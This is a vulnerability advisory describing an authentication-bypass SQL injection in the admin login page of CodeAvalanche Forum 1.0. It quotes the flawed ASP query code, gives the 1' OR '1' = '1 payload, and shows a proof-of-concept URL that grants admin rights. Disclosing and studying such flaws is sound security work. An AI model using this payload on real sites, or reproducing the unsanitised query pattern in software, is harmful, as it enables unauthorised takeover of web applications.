CA Forum Remote SQL Injection

Risk: Medium
Local: No
Remote: Yes

CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

------------------------------------------------------------------ - CAForum 1.0 Remote SQL Injection - -= =- ------------------------------------------------------------------ -= CodeAvalanche Forum Version 1.0 =- Omnipresent june 01, 2006 Vunerability(s): ---------------- SQL Injection Product: -------- CodeAvalanche Forum Version 1.0 Vendor: -------- Description of product: ----------------------- CodeAvalanche FreeForum is asp forum application which allows free posting, there is no needs for registration of your visitors. Administrator can add unlimited number of forum categories. Vulnerability / Exploit: ------------------------ In the file default.asp in Admin directory is vulnerable to an Remote SQL Injection Attack. A malicious people can gain Admin rights by putting rights parameters in the Password Variable. Let's Check the source code: <% Response.Buffer = True userLogged=false If Request("Password")<>"" Then 'response.Write(Request("Password")) 'response.flush dim rsUser,selectSQL selectSQL="SELECT * FROM PARAMS where PASSWORD='" & Request("Password") & "'" [...] [End default.asp] As you can see the variable Password is not properly sanitized before be used, so an attacker can put this string in the password field: 1' OR '1' = '1 So, the query will be: selectSQL="SELECT * FROM PARAMS where PASSWORD='1' OR '1' = '1' And you can gain access to the application with admin rights. PoC / Proof of Concept of SQL Injection: ---------------------------------------- This is a simple Proof Of Concept used on my local machine:[Application_Path]/[CAForum]/admin/default.asp?password =1'%20OR%20'1'%20=%20'1 Vendor Status ------------- Not informed! Credits: -------- omnipresent omnipresent (at) email (dot) it [email concealed]

Vote for this issue:


Thanks for you vote!


Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024,


Back to Top